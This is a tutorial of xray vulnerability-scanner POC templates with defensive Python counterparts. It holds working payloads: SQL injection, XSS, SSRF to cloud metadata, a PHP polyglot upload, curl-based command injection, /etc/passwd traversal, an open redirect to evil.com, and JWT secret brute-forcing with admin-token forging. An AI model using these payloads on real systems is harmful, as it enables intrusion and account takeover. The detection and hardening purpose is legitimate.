
xray POC writing examples

Unauthorized scanning and testing is prohibited!!!

1. Time-based blind SQL injection detection (Time-Based Blind SQLi)

name: generic/time-based-sqli
rules:
  - method: GET
    path: "/product?id=1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--+"
    # response.latency is the round-trip time in milliseconds; there is no
    # response.body.duration field in xray.
    expression: |
      response.status == 200 && response.latency >= 5000
detail:
  description: |
    Time-based SQL injection via a SLEEP(5) payload in the id parameter.
    A slow backend also satisfies "latency >= 5000", so confirm a hit with a
    baseline request and a second, longer sleep before reporting it.
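The single-rule POC above fires on any request that takes five seconds, which includes a slow but uninjectable backend. The following is an added example (not code from the page or from xray) of the confirmation logic a scanner should apply: measure a baseline, then SLEEP(d) and SLEEP(2d), and only report when the latency tracks the requested delay. The HTTP client is a constructed stand-in that returns simulated latencies so the example runs offline; `make_backend`, `sleep_payload` and the latency values are assumptions.

```python
# Confirmation logic for a time-based blind SQLi finding.  A single
# "latency >= 5000 ms" test also fires on a slow backend; asking for two
# different delays and checking that latency tracks the requested sleep
# separates injection from ordinary slowness.


def make_backend(vulnerable: bool, base_latency_ms: float = 300.0):
    """Constructed stand-in for the HTTP client: returns round-trip time in ms.
    A vulnerable backend honours SLEEP(n) in the injected value."""
    def send(id_value: str) -> float:
        extra_ms = 0.0
        if vulnerable and "SLEEP(" in id_value:
            seconds = id_value.split("SLEEP(", 1)[1].split(")", 1)[0]
            extra_ms = float(seconds) * 1000.0
        return base_latency_ms + extra_ms
    return send


def sleep_payload(seconds: int) -> str:
    # Same MySQL payload shape as the POC above.
    return f"1' AND (SELECT 1 FROM (SELECT SLEEP({seconds}))a)--+"


def naive_check(send, delay_s: int = 5) -> bool:
    """What the single-rule POC does: one request, one fixed threshold."""
    return send(sleep_payload(delay_s)) >= delay_s * 1000.0


def confirm_time_based_sqli(send, delay_s: int = 5, tolerance_ms: float = 1000.0) -> bool:
    """Baseline, SLEEP(d), SLEEP(2d): report only if each step adds roughly d seconds."""
    baseline = send("1")
    t_short = send(sleep_payload(delay_s))
    t_long = send(sleep_payload(2 * delay_s))
    expected = delay_s * 1000.0 - tolerance_ms
    return (t_short - baseline >= expected) and (t_long - t_short >= expected)


if __name__ == "__main__":
    slow_but_safe = make_backend(vulnerable=False, base_latency_ms=6000.0)
    injectable = make_backend(vulnerable=True)
    print("naive on slow backend:", naive_check(slow_but_safe))                  # True (false positive)
    print("confirmed on slow backend:", confirm_time_based_sqli(slow_but_safe))  # False
    print("confirmed on injectable:", confirm_time_based_sqli(injectable))       # True
```

In a real scanner the baseline should be the median of several requests, and the tolerance should be derived from the observed jitter rather than fixed at one second.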

2. Generic XSS detection (reflected)

name: generic/dom-xss
rules:
  - method: GET
    path: "/search?q=<svg/onload=alert(1)>"
    expression: |
      response.status == 200 && response.content_type.contains("text/html") && response.body.bcontains(b"<svg/onload=alert(1)>")
detail:
  description: |
    The SVG payload from the search parameter is reflected unencoded into an HTML response.
    Matching the whole payload instead of just "<svg" avoids firing on pages that legitimately contain inline SVG.
    This is a reflected XSS check: DOM-based XSS is triggered by client-side script and cannot be detected from the server response alone.

3. SSRF detection

name: generic/ssrf-aws-metadata
rules:
  - method: POST
    path: /api/import
    headers:
      Content-Type: application/json
    body: |
      {"url":"http://169.254.169.254/latest/meta-data/"}
    expression: |
      response.status == 200 && response.body.bmatches(b"(?i)instance-id|ami-id")
detail:
  description: |
    The import endpoint fetches an attacker-supplied URL and returns its body, here the AWS
    instance metadata index (IMDSv1). Hosts enforcing IMDSv2 (a session token is required)
    or running on another cloud will not match; adjust the target URL and regex accordingly.
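The defensive counterpart of the POC above is a URL validator on the server side of an import endpoint. The following is an added example (not code from the page or from xray) written in Python: it refuses non-http(s) schemes, credentials in the URL, and any literal or resolved address that is loopback, private, link-local (the 169.254.169.254 metadata range) or otherwise internal, including the decimal (`2852039166`) and IPv4-mapped IPv6 forms that slip past naive string filters. The function name `is_safe_import_url`, the resolver stub and the hostnames are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def literal_ip(host: str):
    """Return an ip_address for a literal host, or None for a DNS name.
    Handles dotted IPv4, bracketed IPv6 and bare decimal (2852039166 is
    169.254.169.254), a common filter bypass."""
    host = host.strip("[]")
    if host.isdigit():
        try:
            return ipaddress.ip_address(int(host))
        except ValueError:
            return None
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def is_internal(ip) -> bool:
    """Block loopback, RFC 1918, link-local (the 169.254.169.254 metadata range),
    multicast, reserved and unspecified addresses, unwrapping IPv4-mapped IPv6."""
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_import_url(url: str, resolve=None) -> bool:
    """Hypothetical server-side check for the /api/import "url" field.
    `resolve` maps a hostname to a list of address strings; with no resolver,
    DNS names are refused (fail closed)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if parts.username is not None or parts.password is not None:
        return False                      # http://trusted@169.254.169.254/
    ip = literal_ip(parts.hostname)
    if ip is not None:
        return not is_internal(ip)
    if resolve is None:
        return False
    addrs = resolve(parts.hostname)
    return bool(addrs) and not any(is_internal(ipaddress.ip_address(a)) for a in addrs)


def fake_resolver(answers: dict):
    """Constructed resolver for offline use; a real one would call socket.getaddrinfo."""
    return lambda host: answers.get(host, [])


if __name__ == "__main__":
    r = fake_resolver({"cdn.example.net": ["93.184.216.34"]})
    print(is_safe_import_url("http://169.254.169.254/latest/meta-data/"))   # False
    print(is_safe_import_url("http://2852039166/latest/meta-data/"))        # False
    print(is_safe_import_url("https://cdn.example.net/data.csv", resolve=r))  # True
```

Checking the resolved addresses is still racy against DNS rebinding (the name may resolve differently when the fetch actually happens); the robust fix is to connect to the vetted address directly and send the Host header yourself, and to disable redirects or re-validate each hop.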

4. File upload bypass detection (polyglot JPEG)

name: generic/file-upload-bypass
rules:
  - method: POST
    path: /upload
    headers:
      Content-Type: multipart/form-data; boundary=XRAY
    # Note: inside a YAML block scalar "\xFF\xD8\xFF\xE0" is sent as the literal
    # backslash text, not as the JPEG magic bytes, and the line endings are LF
    # rather than the CRLF multipart expects. Build the body with real bytes
    # (outside YAML) when the target actually checks the magic number.
    body: |
      --XRAY
      Content-Disposition: form-data; name="file"; filename="test.jpg"
      Content-Type: image/jpeg

      \xFF\xD8\xFF\xE0<?php echo md5(123); ?>
      --XRAY--
    expression: |
      response.status == 200 && response.body.bcontains(b"202cb962ac59075b964b07152d234b70")
detail:
  description: |
    File upload bypass via a polyglot JPEG/PHP file. The expression matches the exact
    md5("123") value rather than any 32-hex string, so it cannot fire on unrelated hashes.
    The upload response itself rarely executes the file; normally a second rule that
    requests the stored file's URL is needed, and that path is application-specific.
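Why the polyglot works, and what a stricter server-side check sees, as an added example (not code from the page or from xray) in Python. The sample inputs are constructed: the POC's own four magic bytes plus PHP, and a minimal structurally valid JPEG (SOI, a 16-byte APP0/JFIF segment, EOI). A magic-bytes check accepts the polyglot; walking the JPEG marker chain rejects it, because the bytes that land in the APP0 length field (`<?`) claim a segment larger than the file.

```python
# Constructed sample inputs: the POC's polyglot body, and a minimal structurally
# valid JPEG (SOI, a 16-byte APP0/JFIF segment, EOI) for comparison.
POLYGLOT = b"\xFF\xD8\xFF\xE0" + b"<?php echo md5(123); ?>"
MINIMAL_JPEG = (b"\xFF\xD8"
                b"\xFF\xE0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
                b"\xFF\xD9")


def magic_says_jpeg(data: bytes) -> bool:
    """The check the polyglot is built to pass: first bytes only."""
    return data[:3] == b"\xFF\xD8\xFF"


def walks_as_jpeg(data: bytes) -> bool:
    """Walk the marker chain after SOI.  Every non-standalone marker carries a
    big-endian length that must fit inside the file; in the polyglot the APP0
    length field is the text '<?' (0x3C3F = 15423 bytes), which does not."""
    if data[:2] != b"\xFF\xD8":
        return False
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return False
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):                    # EOI, or SOS (scan data follows)
            return True
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM, RSTn: no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return False
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2 or pos + 2 + seg_len > len(data):
            return False
        pos += 2 + seg_len
    return False


def upload_check_naive(filename: str, data: bytes) -> bool:
    """Extension allowlist plus magic bytes: what the POC's payload defeats."""
    return filename.lower().endswith(".jpg") and magic_says_jpeg(data)


def upload_check_structural(filename: str, data: bytes) -> bool:
    """Extension allowlist plus a consistent marker chain."""
    return filename.lower().endswith(".jpg") and walks_as_jpeg(data)


if __name__ == "__main__":
    print(upload_check_naive("test.jpg", POLYGLOT))         # True
    print(upload_check_structural("test.jpg", POLYGLOT))    # False
    print(upload_check_structural("photo.jpg", MINIMAL_JPEG))  # True
```

The structural walk raises the bar but does not close the hole: a polyglot with a correct APP0 segment and the PHP inside a COM segment passes it. The fix that holds is to re-encode uploaded images and to store uploads where the web server never executes them.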

5. RCE detection (blind command injection)

name: generic/rce-blind
set:
  reverse: newReverse()
  reverseURL: reverse.url
rules:
  - method: GET
    path: "/api/ping?ip=127.0.0.1;curl${IFS}{{reverseURL}}"
    expression: |
      reverse.wait(5)
detail:
  description: |
    Blind command injection confirmed by an out-of-band callback: the injected curl
    contacts xray's reverse server and reverse.wait(5) succeeds if the callback arrives
    within five seconds. This requires the reverse platform to be configured in xray's
    config.yaml. A fixed dnslog host combined with a "search" on the response body
    cannot observe a callback, since the evidence never appears in the HTTP response.

6. Advanced directory traversal detection

name: generic/path-traversal
rules:
  - method: GET
    path: "/download?file=....//....//....//etc/passwd"
    expression: |
      response.status == 200 && response.body.bmatches(b"root:[x*]:0:0:")
detail:
  description: |
    Path traversal using "....//" sequences, which survive a filter that strips "../"
    in a single pass: removing the inner "../" from each "....//" leaves "../", so the
    filtered path becomes ../../../etc/passwd.
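The filter the `....//` payload is built to defeat, beside the hardened form, as an added example (not code from the page or from xray) in Python. `BASE` is an assumed download root; `posixpath` is used instead of `os.path` so the example runs without touching the filesystem.

```python
import posixpath

BASE = "/var/www/files"   # assumed download root


def strip_dotdot_once(name: str) -> str:
    """The filter that '....//' is built to beat: a single pass of replace()."""
    return name.replace("../", "")


def resolve_naive(name: str) -> str:
    """Filter, then join: each '....//' collapses to '../' and escapes BASE."""
    return posixpath.normpath(posixpath.join(BASE, strip_dotdot_once(name)))


def resolve_hardened(name: str):
    """Normalise the joined path first, then require it to stay under BASE.
    Returns the resolved path, or None if it would leave BASE.  In production
    use os.path.realpath so that a symlink under BASE cannot point outside it,
    and decode percent-encoding exactly once at the boundary before calling."""
    full = posixpath.normpath(posixpath.join(BASE, name))
    if full == BASE or full.startswith(BASE + "/"):
        return full
    return None


if __name__ == "__main__":
    payload = "....//....//....//etc/passwd"
    print(resolve_naive(payload))      # /etc/passwd
    print(resolve_hardened(payload))   # /var/www/files/..../..../..../etc/passwd
    print(resolve_hardened("../../../etc/passwd"))  # None
```

Note that `posixpath.join` discards BASE when `name` is absolute, which is why the check is applied to the result of the join rather than to the input string.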

7. Deserialization vulnerability detection

name: generic/java-deserialization
rules:
  - method: POST
    path: /api/data
    headers:
      Content-Type: application/java-serialized-object
    # The body must be the raw serialized stream (it starts with the bytes
    # AC ED 00 05); Base64 text is shown only because raw bytes cannot be
    # written in a YAML block scalar.
    body: |
      rO0ABXQAAAAAAAQA... (Base64-encoded CommonsCollections5 payload)
    expression: |
      response.status == 500 && response.body.bmatches(b"(?i)InvokerTransformer|CommonsCollections")
detail:
  description: |
    Java deserialization detected via a CommonsCollections gadget chain. Matching gadget
    class names in a 500 response only works when the stack trace is leaked to the client;
    a callback through xray's reverse module, as in the blind RCE POC, is the reliable signal.

8. JWT weak key detection

name: generic/jwt-weak-key
rules:
  - method: GET
    path: /api/user
    headers:
      Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
    expression: |
      response.status == 200 && !response.body.bcontains(b"invalid_token")
detail:
  description: |
    The endpoint accepts a token the tester signed with a known public test secret. The
    token above is the jwt.io sample token, HS256 over the secret "your-256-bit-secret";
    acceptance proves weak-key use only if the application really signs with that secret.
    The dependable check is to capture a real token from the target and brute-force its
    HS256 secret offline against a wordlist, then forge claims with the recovered key.
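The offline brute-force the description calls for, as an added example (not code from the page or from xray) in Python using only the standard library. It recovers the secret of the POC's token from a small constructed wordlist and then forges a token with different claims, which is what makes a weak HS256 key exploitable. The wordlist and the forged claims are assumptions.

```python
import base64
import hashlib
import hmac
import json

# The token from the POC above (the jwt.io sample token).
TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
         "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c")

# Constructed wordlist; in practice use a real JWT-secret wordlist.
WORDLIST = ["secret", "password", "123456", "your-256-bit-secret", "changeme"]


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def hs256(key: bytes, signing_input: bytes) -> bytes:
    return hmac.new(key, signing_input, hashlib.sha256).digest()


def brute_force_hs256(token: str, candidates):
    """Return the first candidate secret that reproduces the signature, else None."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None                       # RS256 etc. need a different attack
    signing_input = f"{h}.{p}".encode()   # header.payload exactly as sent
    sig = b64url_decode(s)
    for key in candidates:
        if hmac.compare_digest(hs256(key.encode(), signing_input), sig):
            return key
    return None


def forge_hs256(secret: str, claims: dict) -> str:
    """Once the secret is known, any claims can be signed."""
    compact = {"separators": (",", ":")}
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, **compact).encode())
    payload = b64url_encode(json.dumps(claims, **compact).encode())
    signing_input = f"{header}.{payload}".encode()
    return f"{header}.{payload}.{b64url_encode(hs256(secret.encode(), signing_input))}"


def claims_of(token: str) -> dict:
    return json.loads(b64url_decode(token.split(".")[1]))


if __name__ == "__main__":
    key = brute_force_hs256(TOKEN, WORDLIST)
    print("recovered secret:", key)                                  # your-256-bit-secret
    forged = forge_hs256(key, {"sub": "1234567890", "role": "admin"})
    print("forged claims:", claims_of(forged))
```

For a key of real entropy this search never terminates usefully; the attack is only viable because HS256 secrets are so often dictionary words or sample values copied from documentation.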

9. OAuth open redirect

name: generic/oauth-open-redirect
rules:
  - method: GET
    path: "/oauth/authorize?redirect_uri=http://evil.com"
    follow_redirects: false
    expression: |
      response.status == 302 && response.headers["Location"].startsWith("http://evil.com")
detail:
  description: |
    Open redirect in the OAuth authorization endpoint. follow_redirects must be off,
    otherwise xray follows the 302 and the Location header is never examined. A real
    authorization endpoint usually requires client_id, response_type and state before
    it redirects at all, so add the application's real values to the query. A server
    that validates redirect_uri by string prefix rejects http://evil.com but accepts
    https://<registered-host>.evil.com; test that variant as well.
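The two redirect_uri validation styles mentioned above, as an added example (not code from the page or from xray) in Python: the prefix comparison that lets `https://app.example.com.evil.com` and `https://app.example.com@evil.com` through, beside the exact-match comparison that RFC 6749 and the OAuth 2.0 Security BCP require. The client registration table and hostnames are constructed.

```python
from urllib.parse import urlsplit

# Constructed client registration: one client, one registered redirect URI.
REGISTERED = {"client-123": "https://app.example.com/callback"}


def origin(uri: str) -> str:
    p = urlsplit(uri)
    return f"{p.scheme}://{p.netloc}"


def redirect_check_prefix(client_id: str, redirect_uri: str) -> bool:
    """Weak: accept anything that starts with the registered origin.
    'https://app.example.com' is a prefix of 'https://app.example.com.evil.com'."""
    reg = REGISTERED.get(client_id)
    return reg is not None and redirect_uri.startswith(origin(reg))


def redirect_check_exact(client_id: str, redirect_uri: str) -> bool:
    """Simple string comparison against the registered URI, as the OAuth specs require."""
    return REGISTERED.get(client_id) == redirect_uri


def effective_host(uri: str):
    """Where a browser would actually go: userinfo before '@' is not the host."""
    return urlsplit(uri).hostname


if __name__ == "__main__":
    for uri in ("https://app.example.com/callback",
                "https://app.example.com.evil.com/",
                "https://app.example.com@evil.com/",
                "http://evil.com"):
        print(f"{uri:45} host={effective_host(uri):20} "
              f"prefix={redirect_check_prefix('client-123', uri)} "
              f"exact={redirect_check_exact('client-123', uri)}")
```

Note that the page's payload, a bare `http://evil.com`, is rejected even by the weak prefix check; it only fires against an endpoint that does no validation at all, so the prefix-style variants belong in the same scan.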

10. Authorization bypass (IDOR) detection

name: generic/idor
set:
  user_id: randomInt(1000, 9999)
rules:
  - method: GET
    path: /api/user/{{user_id}}
    expression: response.status == 403
  - method: GET
    path: /api/user/{{user_id}}
    headers:
      X-Original-User-ID: admin
    expression: |
      response.status == 200 && response.body.bmatches(b'"role":"admin"')
detail:
  description: |
    Access to another user's record is denied (403) until the X-Original-User-ID header is
    added, after which the same request succeeds and returns an admin record. Rules run in
    order and all must hold, so the first request establishes that the endpoint does enforce
    access control and the second shows the bypass. The header name is application-specific;
    variables are declared under "set" in xray POCs, not "variables".
